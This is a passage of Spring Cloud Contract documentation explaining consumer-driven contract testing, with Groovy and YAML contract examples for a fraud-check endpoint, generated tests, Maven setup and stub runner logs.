are\nused to test contracts between applications and not to simulate full behavior.\n\n=== How It Works\n\nThis section explores how Spring Cloud Contract Verifier with Stub Runner works.\n\n==== A three second tour\n\n===== On the Producer Side\n\nIn order to start working with `Spring Cloud Contract`, add files with REST\/ messaging contracts expressed in either\nGroovy DSL or YAML to the contracts directory set by the\n`contractsDslDir` property, by default `$rootDir\/src\/test\/resources\/contracts`.\n\nThen, add Spring Cloud Contract Verifier dependency and plugin to your build file:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nNow, running `.\/mvnw clean install` will cause tests that verify the application\ncompliance with the added contracts to be automatically generated, by default under `org.springframework.cloud.contract.verifier.tests.`.\n\nAs the implementation of the functionalities described by the contracts is not yet present,\n the tests will fail.\n\nTo make them pass, the correct implementation of either handling HTTP requests or messages\nwill have to be added. Also, a correct base test class for auto-generated tests needs to be added to the project.\nThis class will be extended by all the auto-generated tests and it should contain all the setup\nnecessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests will pass, and both the application\n and the stub artifacts will be built and installed in the local Maven repository. The changes can now be merged\n and both the application and the stub artifacts may be published in an online repository.\n\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running WireMock instance\/\nmessaging route that simulates the actual service.\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nGet the Producer-side stubs installed in your Maven repository by either:\n\n- checking out the Producer side repository, adding contracts and generating the stubs by running:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nTIP: The tests are being skipped because the Producer-side contract implementation is not in place yet,\nso the automatically-generated contract tests would fail;\n\nor:\n\n- getting already existing producer service stubs from a remote repository; to do this, simply pass the\n stub artifact ids and artifact repository url as `Spring Cloud Contract Stub Runner` properties:\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow just annotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide\nthe group-id and artifact-id for `Spring Cloud Contract Stub Runner` to run the collaborators' stubs for you.\n\nTIP: Use the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nNow in your integration test, you will be able to receive stubbed versions of HTTP responses or messages that are\nexpected to be emitted by the collaborator service.\n\n==== A three minute tour\n\n===== On the Producer Side\n\nIn order to start working with `Spring Cloud Contract`, add files with REST\/ messaging contracts expressed in either\nGroovy DSL or YAML to the contracts directory set by the\n`contractsDslDir` property, by default `$rootDir\/src\/test\/resources\/contracts`.\n\nFor the HTTP stubs, a contract defines what kind of response should be returned for a given request (taking into account the HTTP\nmethods, urls, headers, status codes, etc.). A sample HTTP stub contract in Groovy DSL would look like this:\n\n[source,groovy,indent=0]\n----\npackage contracts\n\norg.springframework.cloud.contract.spec.Contract.make {\n\trequest {\n\t\tmethod 'PUT'\n\t\turl '\/fraudcheck'\n\t\tbody([\n\t\t\t \"client.id\": $(regex('[0-9]{10}')),\n\t\t\t loanAmount: 99999\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n\tresponse {\n\t\tstatus 200\n\t\tbody([\n\t\t\t fraudCheckStatus: \"FRAUD\",\n\t\t\t \"rejection.reason\": \"Amount too high\"\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n}\n----\n\nWhile the same contract expressed in YAML would look the following way:\n\n[source,yaml,indent=0]\n----\nrequest:\n method: PUT\n url: \/fraudcheck\n body:\n \"client.id\": 1234567890\n loanAmount: 99999\n headers:\n Content-Type: application\/json\n matchers:\n body:\n - path: $.['client.id']\n type: by_regex\n value: \"[0-9]{10}\"\nresponse:\n status: 200\n body:\n fraudCheckStatus: \"FRAUD\"\n \"rejection.reason\": \"Amount too high\"\n headers:\n Content-Type: application\/json;charset=UTF-8\n----\n\nIn the case of messaging, the input and the output messages can be defined (taking into account from and\nwhere to it was sent, the message body and header), as well as the methods that should be called after the message\n is received or the methods that, when called, should trigger a message.\nAn example of a Camel messaging contract expressed in Groovy DSL whould look like this:\n\n[source,groovy]\n----\ninclude::{verifier_core_path}\/src\/test\/groovy\/org\/springframework\/cloud\/contract\/verifier\/builder\/MessagingMethodBodyBuilderSpec.groovy[tags=trigger_no_output_dsl]\n----\n\nWhile, the same contract expressed in YAML would look as in the code below:\n\n[source,yml,indent=0]\n----\ninclude::{verifier_core_path}\/src\/test\/resources\/yml\/contract_message_scenario3.yml[indent=0]\n----\n\nThen, add Spring Cloud Contract Verifier dependency and plugin to your build file:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nNow, running `.\/mvnw clean install` will cause tests that verify the application\ncompliance with the added contracts to be automatically generated, by default under `org.springframework.cloud.contract.verifier.tests.`.\n\nA sample auto-generated test for an HTTP contract would look the following way:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nThe sample above uses Spring's `MockMvc` to run the tests. This is the default test mode for HTTP\ncontracts, however also JAX-RX client and explicit HTTP invocations can be used as well (just change\nthe `testMode` property of the plugin to `JAX-RS` or `EXPLICIT`.\n\nApart from the default JUnit, you can also use Spock tests, instead, by setting the plugin `testFramework`\nproperty to `Spock`.\n\nTIP: You can now also generate WireMock scenarios based on the contracts, by including an order number followed by\n an underscore at the beginning of the contract file names.\n\nA sample auto-generated test in Spock for a messaging stub contract would look similar to this:\n\n [source,groovy,indent=0]\n----\ngiven:\n\t ContractVerifierMessage inputMessage = contractVerifierMessaging.create(\n\t\t\\'\\'\\'{\"bookName\":\"foo\"}\\'\\'\\',\n\t\t['sample': 'header']\n\t)\n\nwhen:\n\t contractVerifierMessaging.send(inputMessage, 'jms:delete')\n\nthen:\n\t noExceptionThrown()\n\t bookWasDeleted()\n----\n\nAs the implementation of the functionalities described by the contracts is not yet present,\n the tests will fail.\n\nTo make them pass, the correct implementation of handling either HTTP requests or messages\nwill have to be added. Also, a correct base test class for auto-generated tests needs to be added to the project.\nThis class will be extended by all the auto-generated tests and it should contain all the setup\nnecessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests will pass, and both the application\n and the stub artifacts will be built and installed in the local Maven repository. Information about\n installing the stubs jar to the local repository will appear in the logs:\n\n[source,bash,indent=0]\n----\n [INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n [INFO]\n [INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n [INFO]\n [INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n [INFO]\n [INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n [INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nThe changes can now be merged and both the application and the stub artifacts may be published in an online repository.\n\n*Docker Project*\n\nIn order to enable working with contracts while creating applications in non-JVM technologies,\nthe `springcloud\/spring-cloud-contract` Docker image has been created. It contains a project that will\nautomatically generate tests for HTTP contracts and execute them in `EXPLICIT` test mode, then, if\nthe tests pass, generate Wiremock stubs and -optionally- publish them to an artifact manager. In order to use the\nimage, it's sufficient to mount the contracts into the `\/contracts` directory and set a few environment variables.\n\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running WireMock instance\/\nmessaging route that simulates the actual service.\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nGet the Producer-side stubs installed in your Maven repository by either:\n\n- checking out the Producer side repository, adding contracts and generating the stubs by running:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nTIP: The tests are being skipped because the Producer-side contract implementation is not in place yet,\nso the automatically-generated contract tests would fail;\n\nor:\n\n- getting already existing producer service stubs from a remote repository; to do this, simply pass the\n stub artifact ids and artifact repository url as `Spring Cloud Contract Stub Runner` properties:\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow just annotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide\nthe group-id and artifact-id for `Spring Cloud Contract Stub Runner` to run the collaborators' stubs for you.\n\nTIP: Use the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nNow in your integration test, you will be able to receive stubbed versions of HTTP responses or messages that are\nexpected to be emitted by the collaborator service. You will see entries similar to theses in the build logs:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\n\n==== Defining the contract\n\nAs consumers of services, we need to define what exactly we want to achieve. We need to\nformulate our expectations. That is why we write contracts.\n\nAssume that you want to send a request containing the ID of a client company and the\namount it wants to borrow from us. You also want to send it to the \/fraudcheck url via\nthe PUT method.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\n==== Client Side\n\nSpring Cloud Contract generates stubs, which you can use during client-side testing.\nYou get a running WireMock instance\/Messaging route that simulates the service.\nYou would like to feed that instance with a proper stub definition.\n\nAt some point in time, you need to send a request to the Fraud Detection service.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation provide the group id and artifact id for the Stub Runner to download stubs of your collaborators.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nAfter that, during the tests, Spring Cloud Contract automatically finds the stubs\n(simulating the real service) in the Maven repository and exposes them on a configured\n(or random) port.\n\n==== Server Side\n\nSince you are developing your stub, you need to be sure that it actually resembles your\nconcrete implementation. You cannot have a situation where your stub acts in one way and\nyour application behaves in a different way, especially in production.\n\nTo ensure that your application behaves the way you define in your stub, tests are\ngenerated from the stub you provide.\n\nThe autogenerated test looks, more or less, like this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\n=== Step-by-step Guide to Consumer Driven Contracts (CDC)\n\nConsider an example of Fraud Detection and the Loan Issuance process. The business\nscenario is such that we want to issue loans to people but do not want them to steal from\nus. The current implementation of our system grants loans to everybody.\n\nAssume that `Loan Issuance` is a client to the `Fraud Detection` server. In the current\nsprint, we must develop a new feature: if a client wants to borrow too much money, then\nwe mark the client as a fraud.\n\nTechnical remark - Fraud Detection has an `artifact-id` of `http-server`, while Loan\nIssuance has an artifact-id of `http-client`, and both have a `group-id` of `com.example`.\n\nSocial remark - both client and server development teams need to communicate directly and\ndiscuss changes while going through the process. CDC is all about communication.\n\nThe https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-server[server\nside code is available here] and https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-client[the\nclient code here].\n\nTIP: In this case, the producer owns the contracts. Physically, all the contract are\nin the producer's repository.\n\n==== Technical note\n\nIf using the *SNAPSHOT* \/ *Milestone* \/ *Release Candidate* versions please add the\nfollowing section to your build:\n\n[source,xml,indent=0,subs=\"verbatim,attributes\",role=\"primary\"]\n.Maven\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=repos,indent=0]\n----\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\",role=\"secondary\"]\n.Gradle\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/build.gradle[tags=deps_repos,indent=0]\n----\n\n==== Consumer side (Loan Issuance)\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server), you might do the following steps:\n\n. Start doing TDD by writing a test for your feature.\n. Write the missing implementation.\n. Clone the Fraud Detection service repository locally.\n. Define the contract locally in the repo of Fraud Detection service.\n. Add the Spring Cloud Contract Verifier plugin.\n. Run the integration tests.\n. File a pull request.\n. Create an initial implementation.\n. Take over the pull request.\n. Write the missing implementation.\n. Deploy your app.\n. Work online.\n\n*Start doing TDD by writing a test for your feature.*\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=client_tdd,indent=0]\n----\n\nAssume that you have written a test of your new feature. If a loan application for a big\namount is received, the system should reject that loan application with some description.\n\n*Write the missing implementation.*\n\nAt some point in time, you need to send a request to the Fraud Detection service. Assume\nthat you need to send the request containing the ID of the client and the amount the\nclient wants to borrow. You want to send it to the `\/fraudcheck` url via the `PUT` method.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nFor simplicity, the port of the Fraud Detection service is set to `8080`, and the\napplication runs on `8090`.\n\nIf you start the test at this point, it breaks, because no service currently runs on port\n`8080`.\n\n*Clone the Fraud Detection service repository locally.*\n\nYou can start by playing around with the server side contract. To do so, you must first\nclone it.\n\n[source,bash,indent=0]\n----\n$ git clone https:\/\/your-git-server.com\/server-side.git local-http-server-repo\n----\n\n*Define the contract locally in the repo of Fraud Detection service.*\n\nAs a consumer, you need to define what exactly you want to achieve. You need to formulate\nyour expectations. To do so, write the following contract:\n\nIMPORTANT: Place the contract under `src\/test\/resources\/contracts\/fraud` folder. The `fraud` folder\nis important because the producer's test base class name references that folder.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\nThe YML contract is quite straight-forward. However when you take a look at the Contract\nwritten using a statically typed Groovy DSL - you might wonder what the\n`value(client(...), server(...))` parts are. By using this notation, Spring Cloud\nContract lets you define parts of a JSON block, a URL, etc., which are dynamic. In case\nof an identifier or a timestamp, you need not hardcode a value. You want to allow some\ndifferent ranges of values. To enable ranges of values, you can set regular expressions\nmatching those values for the consumer side. You can provide the body by means of either\na map notation or String with interpolations.\nhttps:\/\/cloud.spring.io\/spring-cloud-contract\/single\/spring-cloud-contract.html#_contract_dsl[Consult the docs\nfor more information.] We highly recommend using the map notation!\n\nTIP: You must understand the map notation in order to set up contracts. Please read the\nhttp:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON].\n\nThe previously shown contract is an agreement between two sides that:\n\n- if an HTTP request is sent with all of\n** a `PUT` method on the `\/fraudcheck` endpoint,\n** a JSON body with a `client.id` that matches the regular expression `[0-9]{10}` and\n`loanAmount` equal to `99999`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`,\n- then an HTTP response is sent to the consumer that\n** has status `200`,\n** contains a JSON body with the `fraudCheckStatus` field containing a value `FRAUD` and\nthe `rejectionReason` field having value `Amount too high`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`.\n\nOnce you are ready to check the API in practice in the integration tests, you need to\ninstall the stubs locally.\n\n*Add the Spring Cloud Contract Verifier plugin.*\n\nWe can add either a Maven or a Gradle plugin. In this example, you see how to add Maven.\nFirst, add the `Spring Cloud Contract` BOM.\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_bom,indent=0]\n----\n\nNext, add the `Spring Cloud Contract Verifier` Maven plugin\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nSince the plugin was added, you get the `Spring Cloud Contract Verifier` features which,\nfrom the provided contracts:\n\n- generate and run tests\n- produce and install stubs\n\nYou do not want to generate tests since you, as the consumer, want only to play with the\nstubs. You need to skip the test generation and execution. When you execute:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\n\nIn the logs, you see something like this:\n\n[source,bash,indent=0]\n----\n[INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n[INFO]\n[INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n[INFO]\n[INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n[INFO]\n[INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n[INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nThe following line is extremely important:\n\n[source,bash,indent=0]\n----\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nIt confirms that the stubs of the `http-server` have been installed in the local\nrepository.\n\n*Run the integration tests.*\n\nIn order to profit from the Spring Cloud Contract Stub Runner functionality of automatic\nstub downloading, you must do the following in your consumer side project (`Loan\nApplication service`):\n\nAdd the `Spring Cloud Contract` BOM:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=contract_bom,indent=0]\n----\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide the\n`group-id` and `artifact-id` for the Stub Runner to download the stubs of your\ncollaborators. (Optional step) Because you're playing with the collaborators offline, you\ncan also provide the offline work switch (`StubRunnerProperties.StubsMode.LOCAL`).\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nNow, when you run your tests, you see something like this:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\nThis output means that Stub Runner has found your stubs and started a server for your app\nwith group id `com.example`, artifact id `http-server` with version `0.0.1-SNAPSHOT` of\nthe stubs and with `stubs` classifier on port `8080`.\n\n*File a pull request.*\n\nWhat you have done until now is an iterative process. You can play around with the\ncontract, install it locally, and work on the consumer side until the contract works as\nyou wish.\n\nOnce you are satisfied with the results and the test passes, publish a pull request to\nthe server side. Currently, the consumer side work is done.\n\n==== Producer side (Fraud Detection server)\n\nAs a developer of the Fraud Detection server (a server to the Loan Issuance service):\n\n*Create an initial implementation.*\n\nAs a reminder, you can see the initial implementation here:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\n*Take over the pull request.*\n\n[source,bash,indent=0]\n----\n$ git checkout -b contract-change-pr master\n$ git pull https:\/\/your-git-server.com\/server-side-fork.git contract-change-pr\n----\n\nYou must add the dependencies needed by the autogenerated tests:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nIn the configuration of the Maven plugin, pass the `packageWithBaseClasses` property\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nIMPORTANT: This example uses \"convention based\" naming by setting the\n`packageWithBaseClasses` property. Doing so means that the two last packages combine to\nmake the name of the base test class. In our case, the contracts were placed under\n`src\/test\/resources\/contracts\/fraud`. Since you do not have two packages starting from\nthe `contracts` folder, pick only one, which should be `fraud`. Add the `Base` suffix and\ncapitalize `fraud`. That gives you the `FraudBase` test class name.\n\nAll the generated tests extend that class. Over there, you can set up your Spring Context\nor whatever is necessary. In this case, use http:\/\/rest-assured.io\/[Rest Assured MVC] to\nstart the server side `FraudDetectionController`.\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/java\/com\/example\/fraud\/FraudBase.java[]\n----\n\nNow, if you run the `.\/mvnw clean install`, you get something like this:\n\n[source,bash,indent=0]\n----\nResults :\n\nTests in error:\n ContractVerifierTest.validate_shouldMarkClientAsFraud:32 \u00bb IllegalState Parsed...\n----\n\nThis error occurs because you have a new contract from which a test was generated and it\nfailed since you have not implemented the feature. The auto-generated test would look\nlike this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = 